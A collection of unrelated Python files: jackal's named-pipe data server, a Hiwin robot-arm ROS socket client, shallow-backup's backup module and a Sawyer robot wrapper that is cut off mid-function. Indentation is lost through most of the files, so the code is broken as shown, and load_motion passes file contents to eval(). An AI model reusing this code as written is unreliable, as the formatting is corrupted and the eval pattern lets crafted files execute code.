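# --- Hedged sketch: serving encode_frame() as an MJPEG stream ---
# Assumes Flask is available; ApsVideo itself does not depend on it. The
# "boundary=frame" parameter must match the b"--frame" marker yielded by
# encode_frame().
#
# from flask import Flask, Response
# app = Flask(__name__)
# video = ApsVideo()
#
# @app.route("/stream")
# def stream():
#     return Response(video.encode_frame(),
#                     mimetype="multipart/x-mixed-replace; boundary=frame")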
|
named_pipes.py
|
#!/usr/bin/env python3
import configparser
import multiprocessing
import os
from jackal import HostSearch, RangeSearch, ServiceSearch, UserSearch
from jackal.config import Config
from jackal.utils import print_error, print_notification, print_success
from jackal.utils import PartialFormatter
fmt = PartialFormatter(missing='')
def pipe_worker(pipename, filename, object_type, query, format_string, unique=False):
"""
Starts the loop to provide the data from jackal.
"""
print_notification("[{}] Starting pipe".format(pipename))
object_type = object_type()
try:
while True:
uniq = set()
# Remove the previous file if it exists
if os.path.exists(filename):
os.remove(filename)
# Create the named pipe
os.mkfifo(filename)
# This function will block until a process opens it
with open(filename, 'w') as pipe:
print_success("[{}] Providing data".format(pipename))
# Search the database
objects = object_type.search(**query)
for obj in objects:
data = fmt.format(format_string, **obj.to_dict())
if unique:
                        if data not in uniq:
uniq.add(data)
pipe.write(data + '\n')
else:
pipe.write(data + '\n')
os.unlink(filename)
except KeyboardInterrupt:
print_notification("[{}] Shutting down named pipe".format(pipename))
except Exception as e:
        print_error("[{}] Error: {}, stopping named pipe".format(pipename, e))
finally:
        if os.path.exists(filename):
            os.remove(filename)
def create_query(section):
"""
Creates a search query based on the section of the config file.
"""
query = {}
if 'ports' in section:
query['ports'] = [section['ports']]
if 'up' in section:
        query['up'] = section.getboolean('up')  # bool() on a non-empty string is always True
if 'search' in section:
query['search'] = [section['search']]
if 'tags' in section:
query['tags'] = [section['tags']]
if 'groups' in section:
query['groups'] = [section['groups']]
return query
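# --- Hedged example config (hypothetical field values) ---
# Each section becomes one named pipe: 'type' selects the search class,
# 'format' is the template rendered per object, 'unique' deduplicates lines,
# and the remaining keys (ports/up/search/tags/groups) feed create_query().
#
# [http_hosts]
# type = service
# ports = 80
# format = {address}:{port}
# unique = 1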
def create_pipe_workers(configfile, directory):
"""
Creates the workers based on the given configfile to provide named pipes in the directory.
"""
type_map = {'service': ServiceSearch,
'host': HostSearch, 'range': RangeSearch,
'user': UserSearch}
config = configparser.ConfigParser()
config.read(configfile)
if not len(config.sections()):
print_error("No named pipes configured")
return
print_notification("Starting {} pipes in directory {}".format(
len(config.sections()), directory))
workers = []
for name in config.sections():
section = config[name]
query = create_query(section)
object_type = type_map[section['type']]
        args = (name, os.path.join(directory, name), object_type, query,
                section['format'], section.getboolean('unique', fallback=False))
workers.append(multiprocessing.Process(target=pipe_worker, args=args))
return workers
def main():
"""
Loads the config and handles the workers.
"""
config = Config()
pipes_dir = config.get('pipes', 'directory')
pipes_config = config.get('pipes', 'config_file')
pipes_config_path = os.path.join(config.config_dir, pipes_config)
if not os.path.exists(pipes_config_path):
print_error("Please configure the named pipes first")
return
workers = create_pipe_workers(pipes_config_path, pipes_dir)
if workers:
for worker in workers:
worker.start()
try:
for worker in workers:
worker.join()
except KeyboardInterrupt:
print_notification("Shutting down")
for worker in workers:
worker.terminate()
worker.join()
if __name__ == '__main__':
main()
|
Hiwin_RT605_ArmCommand_Socket_20190627170600.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
# Receive commands from the strategy side and forward them to the control PC over a socket
import socket
## Multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' # initial value for the transmitted data
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        # NOTE: the classic recipe raised StopIteration here, which breaks
        # under PEP 479 (Python 3.7+); returning ends the generator cleanly.
        return
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
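# A minimal sketch of how the switch recipe above is used elsewhere in this
# file (the numeric cases here are arbitrary):
#
# for case in switch(2):
#     if case(1):
#         pass   # not taken
#         break
#     if case(2, 3):
#         pass   # taken: the value 2 matches this case
#         break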
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ## Receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## Receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## Receive speed-mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ## Receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ## Create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
#print ("Ready to connect")
#rospy.spin() ## spin one
##------------ server side end -------
##---------- socket packet transmission --------------##
##--------------- send arm commands over the socket -----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #-------Set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #-------Set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #-------Set the arm's rapid/safe speed mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 5 ## reset to the initial mode state
        Socket.send(data.encode('utf-8')) # send over the socket; encode the str into bytes for transmission
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
        # The arm side reports its state
        if str(feedback_str[2]) == '48': # '0' (False): the arm is Ready to receive the next motion command
state_feedback.ArmState = 0
# Arm_feedback = 0
# socket_client_arm_state(Arm_feedback)
#print("isbusy false")
        if str(feedback_str[2]) == '49': # '1' (True): the arm is busy and cannot execute the next motion command
state_feedback.ArmState = 1
# Arm_feedback = 1
# socket_client_arm_state(Arm_feedback)
#print("isbusy true")
        if str(feedback_str[2]) == '54': # '6': the strategy has finished
state_feedback.ArmState = 6
# Arm_feedback = 6
# socket_client_arm_state(Arm_feedback)
print("shutdown")
        # check the sent flag
        if str(feedback_str[4]) == '48': # feedback 0: False
state_feedback.SentFlag = 0
# Socket_sent_flag = False
# socket_client_sent_flag(Socket_sent_flag)
        if str(feedback_str[4]) == '49': # feedback 1: True
state_feedback.SentFlag = 1
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
        ##--------------- send arm commands over the socket: end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## Multithreading
def thread_test():
socket_client()
## Multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5 ## reset to the initial mode state
t = threading.Thread(target=thread_test)
    t.start() # start the worker thread
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
backup.py
|
import os
from shlex import quote
from colorama import Fore
import multiprocessing as mp
from shutil import copytree, copyfile
from .utils import *
from .printing import *
from .compatibility import *
from .config import get_config
def backup_dotfiles(backup_dest_path, home_path=os.path.expanduser("~"), skip=False):
"""
Create `dotfiles` dir and makes copies of dotfiles and dotfolders.
Assumes that dotfiles are stored in the home directory.
:param skip: Boolean flag to skip prompting for overwrite. Used for scripting.
:param backup_dest_path: Destination path for dotfiles. Like, ~/shallow-backup/dotfiles
:param home_path: Path where dotfiles will be found. $HOME by default.
"""
print_section_header("DOTFILES", Fore.BLUE)
overwrite_dir_prompt_if_needed(backup_dest_path, skip)
# get dotfolders and dotfiles
config = get_config()
# dotfiles/folders multiprocessing format: [(full_dotfile_path, full_dest_path), ...]
dotfolders_mp_in = []
for dotfolder in [os.path.join(home_path, folder) for folder in config["dotfolders"]]:
if os.path.isdir(dotfolder):
dest_path_nested_dir = os.path.join(backup_dest_path, dotfolder.replace(home_path + "/", ""))
dotfolders_mp_in.append((quote(dotfolder), quote(dest_path_nested_dir)))
dotfiles_mp_in = []
for dotfile in config["dotfiles"]:
full_dotfile_path = os.path.join(home_path, dotfile)
if os.path.isfile(full_dotfile_path):
dest_path = quote(os.path.join(backup_dest_path, dotfile))
dotfiles_mp_in.append((quote(full_dotfile_path), dest_path))
# Fix https://github.com/alichtman/shallow-backup/issues/230
for dest_path in [path_pair[1] for path_pair in dotfiles_mp_in + dotfolders_mp_in]:
create_dir_if_doesnt_exist(os.path.split(dest_path)[0])
    # Start all copy processes first and join them afterwards so the copies
    # actually run in parallel; a start()/join() pair inside the loop would
    # run them one at a time, and the mp.Pool previously created here was
    # never used.
    print_blue_bold("Backing up dotfolders...")
    processes = []
    for src, dest in dotfolders_mp_in:
        p = mp.Process(target=copy_dir_if_valid, args=(src, dest))
        p.start()
        processes.append(p)
    print_blue_bold("Backing up dotfiles...")
    for src, dest in dotfiles_mp_in:
        p = mp.Process(target=copyfile, args=(src, dest))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
def backup_configs(backup_path, skip=False):
"""
Creates `configs` directory and places config backups there.
Configs are application settings, generally. .plist files count.
In the config file, the value of the configs dictionary is the dest
path relative to the configs/ directory.
"""
print_section_header("CONFIGS", Fore.BLUE)
overwrite_dir_prompt_if_needed(backup_path, skip)
config = get_config()
print_blue_bold("Backing up configs...")
# backup config files + dirs in backup_path/<target>/
for path_to_backup, target in config["config_mapping"].items():
print("BACKUP:", path_to_backup)
print("TARGET:", target)
dest = os.path.join(backup_path, target)
if os.path.isdir(path_to_backup):
# TODO: Symlink to speed things up
copytree(path_to_backup, quote(dest), symlinks=True)
elif os.path.isfile(path_to_backup):
parent_dir = dest[:dest.rfind("/")]
safe_mkdir(parent_dir)
copyfile(path_to_backup, quote(dest))
# backup crontab
command = "crontab -l"
dest = os.path.join(backup_path, "crontab.txt")
run_cmd_write_stdout(command, dest)
def backup_packages(backup_path, skip=False):
"""
Creates `packages` directory and places install list text files there.
"""
print_section_header("PACKAGES", Fore.BLUE)
overwrite_dir_prompt_if_needed(backup_path, skip)
std_package_managers = [
"brew",
"brew cask",
"gem"
]
for mgr in std_package_managers:
# deal with package managers that have spaces in them.
print_pkg_mgr_backup(mgr)
command = "{} list".format(mgr)
dest = "{}/{}_list.txt".format(backup_path, mgr.replace(" ", "-"))
run_cmd_write_stdout(command, dest)
# cargo
print_pkg_mgr_backup("cargo")
command = "ls {}".format(home_prefix(".cargo/bin/"))
dest = "{}/cargo_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# pip
print_pkg_mgr_backup("pip")
command = "pip list --format=freeze"
dest = "{}/pip_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# pip3
print_pkg_mgr_backup("pip3")
command = "pip3 list --format=freeze"
dest = "{}/pip3_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# npm
print_pkg_mgr_backup("npm")
command = "npm ls --global --parseable=true --depth=0"
temp_file_path = "{}/npm_temp_list.txt".format(backup_path)
if not run_cmd_write_stdout(command, temp_file_path):
npm_dest_file = "{0}/npm_list.txt".format(backup_path)
# Parse npm output
with open(temp_file_path, mode="r+") as temp_file:
            # Skip the first line of npm output (the global install prefix);
            # seek(1) only skipped one byte, not one line
            temp_file.readline()
with open(npm_dest_file, mode="w+") as dest:
for line in temp_file:
dest.write(line.split("/")[-1])
os.remove(temp_file_path)
# atom package manager
print_pkg_mgr_backup("Atom")
command = "apm list --installed --bare"
dest = "{}/apm_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# vscode extensions
print_pkg_mgr_backup("VSCode")
command = "code --list-extensions --show-versions"
dest = "{}/vscode_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# macports
print_pkg_mgr_backup("macports")
command = "port installed requested"
dest = "{}/macports_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# system installs
print_pkg_mgr_backup("System Applications")
applications_path = get_applications_dir()
command = "ls {}".format(applications_path)
dest = "{}/system_apps_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
def backup_fonts(backup_path, skip=False):
"""
Copies all .ttf and .otf files in ~/Library/Fonts/ to backup/fonts/
"""
print_section_header("FONTS", Fore.BLUE)
overwrite_dir_prompt_if_needed(backup_path, skip)
print_blue("Copying '.otf' and '.ttf' fonts...")
fonts_path = get_fonts_dir()
if os.path.isdir(fonts_path):
fonts = [quote(os.path.join(fonts_path, font)) for font in os.listdir(fonts_path) if
font.endswith(".otf") or font.endswith(".ttf")]
for font in fonts:
if os.path.exists(font):
copyfile(font, os.path.join(backup_path, font.split("/")[-1]))
else:
print_red('Skipping fonts backup. No fonts directory found.')
def backup_all(dotfiles_path, packages_path, fonts_path, configs_path, skip=False):
"""
Complete backup procedure.
"""
backup_dotfiles(dotfiles_path, skip=skip)
backup_packages(packages_path, skip)
backup_fonts(fonts_path, skip)
backup_configs(configs_path, skip)
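# --- Hedged usage sketch (not part of shallow-backup's CLI) ---
# The paths below are placeholders; the real tool derives them from its own
# config. Kept as comments because this module uses relative imports and is
# not meant to be executed directly.
#
# root = os.path.expanduser("~/shallow-backup")
# backup_all(os.path.join(root, "dotfiles"),
#            os.path.join(root, "packages"),
#            os.path.join(root, "fonts"),
#            os.path.join(root, "configs"),
#            skip=True)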
|
mysawyer.py
|
#
# Copyright (C) 2018 Isao Hara,AIST,JP
# All rights reserved
#
#
from __future__ import print_function
import os
import sys
import traceback
import rospy
import intera_interface
import numpy as np
import threading
import cv2
import cv_bridge
import tf
import JARA_ARM
#
#
from intera_core_msgs.msg import InteractionControlCommand
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseStamped
import PyKDL
from tf_conversions import posemath
from intera_motion_interface import (
MotionTrajectory,
MotionWaypoint,
MotionWaypointOptions,
InteractionOptions
)
from intera_motion_msgs.msg import TrajectoryOptions
from std_msgs.msg import String
from sensor_msgs.msg import Image
#
#
#
class MySawyer(object):
#
# Init class
def __init__(self, name='MySawyer', limb='right', anonymous=True, disable_signals=True, light=True, gripper_reverse=False):
rospy.init_node(name, anonymous=anonymous, disable_signals=disable_signals)
# rospy.sleep(1)
#
#
self._limb=None
self._head=None
self._light=None
self._head_display=None
self._display=None
self._cuff=None
self._limits=None
self._navigator=None
self._init_nodes(limb,light)
self._get_gripper(gripper_reverse)
#
# Default Variables
self._home_pos=[0.0, -1.178, 0.0, 2.178, 0.0, 0.567, 3.313]
self._init_pos=[0.0, -1.178, 0.0, 2.178, 0.0, 0.567, 3.313]
self._default_pos=[0.0, -0.9, 0.0, 1.8, 0.0, -0.9, 0.0]
self._motion_trajectory=None
#self._joint_names=self._limb.joint_names()
#self._velocity_limits=self._limits.joint_velocity_limits()
#
# for motion controller
self._motions={}
self._joint_positions={'home':self._home_pos,'init':self._init_pos, 'default':self._default_pos}
self._index=0
self._p_index=0
self._is_recording=False
self.max_record_time=30
        self._accuracy=0.01 # 0.05; threshold used by both the velocity and position control modes
self._recording_intval=0.5
#
# for velicity control mode
self._running=True
self._target=[0.0, -1.178, 0.0, 2.178, 0.0, 0.567, 3.313] ### initial position
self._target_motion=[]
self._vmax=0.4
self._vrate=2.0
self._is_moving=False
#
# for interaction mode
self._speed_ratio=0.1 # 0.001 -- 1.0
self._max_speed_ratio=0.5 # 0.001 -- 1.0
self._max_accel_ratio=0.5 # 0.001 -- 1.0
        self._trajType='JOINT' # 'JOINT' or 'CARTESIAN'
self._interaction_active=True
self._K_impedance=[1300.0,1300.0, 1300.0, 30.0, 30.0, 30.0]
self._max_impedance=[1,1,1,1,1,1]
self._interaction_control_mode=[1,1,1,1,1,1]
self._interaction_frame=[0,0,0,1,0,0,0]
self._in_endpoint_frame=False
self._endpoint_name='right_hand'
self._force_command=[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
self._K_nullspace=[5.0, 10.0, 5.0, 10.0, 5.0, 10.0, 5.0]
self._disable_damping_in_force_control=False
self._disable_reference_resetting=False
self._rotations_for_constrained_zeroG=False
self._timeout=None
# for Cartesian Pose base motion
self._in_tip_frame=False
self._tip_name='right_hand'
self._linear_speed=0.6 # m/s
self._linear_accel=0.6 # m/s/s
self._rotational_speed=1.57 # rad/s
self._rotational_accel=1.57 # rad/s/s
## for event handlers
self.ok_id=None
self.show_id=None
self.back_id=None
#
# for RTC
self._is_pause=False
#
#
def _init_nodes(self, limb, light):
try:
self._limb=intera_interface.Limb(limb)
self._head=intera_interface.Head()
self._light=SawyerLight(light)
#self._head_display=intera_interface.HeadDisplay()
self._display=SawyerDisplay()
self._cuff=intera_interface.Cuff()
self._limits=intera_interface.JointLimits()
self._navigator=intera_interface.Navigator()
self._joint_names=self._limb.joint_names()
self._velocity_limits=self._limits.joint_velocity_limits()
self._stop_cmd={}
for i,name in enumerate(self._joint_names):
self._stop_cmd[name]=0.0
except:
print("Warning caught exception...")
traceback.print_exc()
pass
#
def _get_gripper(self, gripper_reverse):
try:
self._gripper=intera_interface.get_current_gripper_interface()
self._is_clicksmart = isinstance(self._gripper, intera_interface.SimpleClickSmartGripper)
self._gripper_reverse=gripper_reverse
if self._is_clicksmart:
if self._gripper.needs_init():
self._gripper.initialize()
_signals=self._gripper.get_ee_signals()
if 'grip' in _signals:
self._gripper_type='grip'
elif 'vacuumOn' in _signals:
self._gripper_type='vacuum'
else:
self._gripper_type='unknown'
else:
if not (self._gripper.is_calibrated() or
self._gripper.calibrate() == True):
raise
except:
self._gripper=None
self._is_clicksmart=False
self._gripper_type=None
self._gripper_reverse=None
#
#
def activate(self):
#
# Enable Robot
self._rs=intera_interface.RobotEnable(intera_interface.CHECK_VERSION)
self._init_state=self._rs.state().enabled
self._rs.enable()
#
# current positions
self._angles=self._limb.joint_angles()
self._pose=self._limb.endpoint_pose()
#
#
self._limb.set_joint_position_speed(self._speed_ratio)
#
# LED white ON
self._light.head_on()
self.mkRosPorts()
self.set_record()
#
#
def mkRosPorts(self):
self._sub=dict()
self._pub=dict()
self._sub['target_joint_pos']=rospy.Subscriber('target_joint_pos', String,self.set_target_joint_pos)
self._pub['current_joint_pos']=rospy.Publisher('current_joint_pos', String,queue_size=1)
self._pub['target_joint_pos']=rospy.Publisher('target_joint_pos', String,queue_size=1)
self._pub['image']=rospy.Publisher('/robot/head_display', Image, latch=True, queue_size=10)
#
#
def set_motion_sequencer(self):
self.set_subscriber('current_joint_pos', self.set_next_target, String)
#
#
def set_subscriber(self, name, func, arg_type=String):
if name in self._sub and self._sub[name]: self._sub[name].unregister()
self._sub[name]=rospy.Subscriber(name, arg_type,func)
def unset_subscriber(self, name):
if name in self._sub and self._sub[name]: self._sub[name].unregister()
self._sub[name]=None
#
#
def enable(self):
self._rs.enable()
#
#
def state(self):
print(self._rs.state())
#
#
def reset(self):
self._rs.reset()
#
#
def disable(self):
self._rs.disable()
#
#
def stop(self):
self._rs.stop()
#
#
def exit_control_mode(self):
self._limb.exit_control_mode()
#
#
def update_pose(self):
self._angles=self._limb.joint_angles()
self._pose=self._limb.endpoint_pose()
#
#
def init_pos(self, use_motion_ctrl=True):
if use_motion_ctrl:
self.move_to([self._init_pos])
else:
self._light.head_green()
self._limb.move_to_neutral(speed=self._speed_ratio)
self.update_pose()
self._light.head_on()
#
#
def set_speed(self, rate=0.3):
self._speed_ratio=rate
self._limb.set_joint_position_speed(rate)
#
#
    def print_joint_pos(self, dtime=5.0, intval=0.1):
end_time = rospy.Time.now() + rospy.Duration(dtime)
while rospy.Time.now() < end_time:
if rospy.is_shutdown() : break
print(self._limb.endpoint_pose())
rospy.sleep(intval)
##############################################
# Joint Position Control (Depreciated for Intera 5.2 and beyond)
def move_joints(self, pos):
self._limb.set_joint_position_speed(self._speed_ratio)
self._light.head_green()
self._limb.move_to_joint_positions(pos)
self.update_pose()
self._light.head_on()
#
#
def move_cart(self, x_dist, y_dist, z_dist):
self._limb.set_joint_position_speed(self._speed_ratio)
self._pose=self.endpoint_pose()
self._pose.position.x += x_dist
self._pose.position.y += y_dist
self._pose.position.z += z_dist
self.move_joints(self._limb.ik_request(self._pose))
#
#
def record_motion(self, name=None, dtime=0, intval=1.0):
if not name :
name=self.mk_motion_name()
self._index += 1
if dtime <= 0:
dtime=self.max_record_time
print ("Start Recording:", name)
self._light.head_blue()
self._motions[name]=[]
self._is_recording=True
end_time = rospy.Time.now() + rospy.Duration(dtime)
while (rospy.Time.now() < end_time) and self._is_recording :
if rospy.is_shutdown() : break
self._motions[name].append(self._limb.joint_angles())
rospy.sleep(intval)
print ("End Recording: record ", len(self._motions[name]), " points")
self._is_recording=False
self._light.head_on()
#
#
def mk_motion_name(self):
name = 'Motion_' + str(self._index)
while name in self._motions:
self._index += 1
name = 'Motion_' + str(self._index)
return name
#
# Record positions
def record_pos(self,val):
if val :
self._light.head_yellow()
name = 'P_' + str(self._p_index)
while name in self._joint_positions:
self._p_index += 1
name = 'P_' + str(self._p_index)
self._joint_positions[name]=self._limb.joint_ordered_angles()
self._light.head_on()
#
# Motion Recorder Event Handleer(Start)
def start_record(self, value):
if value:
print('Start..')
self.record_motion(None, 0, self._recording_intval)
#
# Motion Recorder Event Handler(Stop)
def stop_record(self, value):
if value:
print('Stop..')
self._is_recording=False
#
# set Event Handlers
def set_record(self):
print ("Register callbacks")
self.ok_id=self._navigator.register_callback(self.start_record, 'right_button_ok')
self.back_id=self._navigator.register_callback(self.stop_record, 'right_button_back')
self.square_id=self._navigator.register_callback(self.record_pos, 'right_button_square')
self.show_id=self._navigator.register_callback(self.unset_record, 'right_button_show')
#
# unset Event Handlers
def unset_record(self, value=0):
if value and self.ok_id :
print ("Unregister all callbacks")
if self._navigator.deregister_callback(self.ok_id) : self.ok_id=None
#if self._navigator.deregister_callback(self.show_id) : self.show_id=None
if self._navigator.deregister_callback(self.back_id) : self.back_id=None
if self._navigator.deregister_callback(self.square_id) : self.square_id=None
def gripper_state(self):
if self.is_gripping :
return 1
else:
return 0
#######################################################
#
# For Joint Position mode (before SDK-5.2)
def play_motion(self, name, intval=0.0):
self._limb.set_joint_position_speed(self._speed_ratio)
self._light.head_green()
for pos in self._motions[name]:
if rospy.is_shutdown() :
self._light.head_red()
return
#
self._limb.move_to_joint_positions(pos, threshold=self._accuracy)
if intval > 0: rospy.sleep(intval)
self._light.head_on()
#
#
def play_motion_seq(self, names):
self._limb.set_joint_position_speed(self._speed_ratio)
self._light.head_green()
for name in names:
for pos in self._motions[name]:
if rospy.is_shutdown() :
self._light.head_red()
return
self._limb.move_to_joint_positions(pos)
self._light.head_on()
###############################################
#
#
def list_motions(self):
print(self._motions.keys())
#
#
def joint_pos_d2l(self, pos):
return map(lambda x: pos[x], self._joint_names)
def convert_motion(self, name):
return map(lambda x: self.joint_pos_d2l(x), self._motions[name])
#
#
def save_motion(self, name):
with open("motions/"+name+".jpos", mode="w") as f:
for pos in self._motions[name]:
f.write(str(pos))
f.write("\n")
#
#
def load_motion(self, name):
self._motions[name]=[]
with open("motions/"+name+".jpos") as f:
motion=f.readlines()
for p in motion:
self._motions[name].append( eval(p) )
#
#
def get_joint_positions(self, name):
if type(name) == str:
if name in self._joint_positions:
target_joints=self._joint_positions[name]
else:
print("Invalid position name")
target_joints=None
elif len(name) == 7:
target_joints=name
return target_joints
####################################
#
# Move Motion
def move_to(self, name=None, tout=None, with_in_contact=False, wait_for_result=True):
#
# for Motion Controller Interface
if type(name) == str and name in self._motions:
waypoints=self.convert_motion(name)
elif type(name) == list:
waypoints=name
else:
print("Invalid motion name")
return None
self._motion_trajectory=MotionTrajectory(limb=self._limb)
_wpt_opts=MotionWaypointOptions(max_joint_speed_ratio=self._max_speed_ratio,
max_joint_accel=self._max_accel_ratio)
_waypoint=MotionWaypoint(options=_wpt_opts, limb=self._limb)
#
# set current joint position...
_waypoint.set_joint_angles(joint_angles=self._limb.joint_ordered_angles())
self._motion_trajectory.append_waypoint(_waypoint.to_msg())
#
# set target joint position...
for pos in waypoints:
if type(pos) == str:
if pos in self._joint_positions:
pos=self._joint_positions[pos]
_waypoint.set_joint_angles(joint_angles=pos)
self._motion_trajectory.append_waypoint(_waypoint.to_msg())
else:
_waypoint.set_joint_angles(joint_angles=pos)
self._motion_trajectory.append_waypoint(_waypoint.to_msg())
#
#
if with_in_contact :
opts=self.get_in_contact_opts()
if opts :
self._motion_trajectory.set_trajectory_options(opts)
#
# run motion...
self._light.head_green()
result=self._motion_trajectory.send_trajectory(wait_for_result=wait_for_result,timeout=tout)
#
#
if result is None:
self._light.head_yellow()
print("Trajectory FAILED to send")
return None
#
#
if not wait_for_result : return True
#
if result.result: self._light.head_on()
else: self._light.head_red()
#
#
self._motion_trajectory=None
return result.result
#
# Move in Certecian Mode
def cart_move_to(self, target_pos, tout=None, relative_mode=False, wait_for_result=True):
#
# for Motion Controller Interface
_trajectory_opts=TrajectoryOptions()
_trajectory_opts.interpolation_type=TrajectoryOptions.CARTESIAN
#
self._motion_trajectory=MotionTrajectory(trajectory_options=_trajectory_opts, limb=self._limb)
#
# set Waypoint Options
_wpt_opts=MotionWaypointOptions(max_linear_speed=self._linear_speed,
max_linear_accel=self._linear_accel,
max_rotational_speed=self._rotational_speed,
max_rotational_accel=self._rotational_accel,
max_joint_speed_ratio=1.0)
_waypoint=MotionWaypoint(options=_wpt_opts, limb=self._limb)
#
endpoint_state=self._limb.tip_state(self._tip_name)
pose=endpoint_state.pose
########################################
# set target position
if relative_mode:
# relative position : target_pos -> x, y, z, roll, pitch, yew
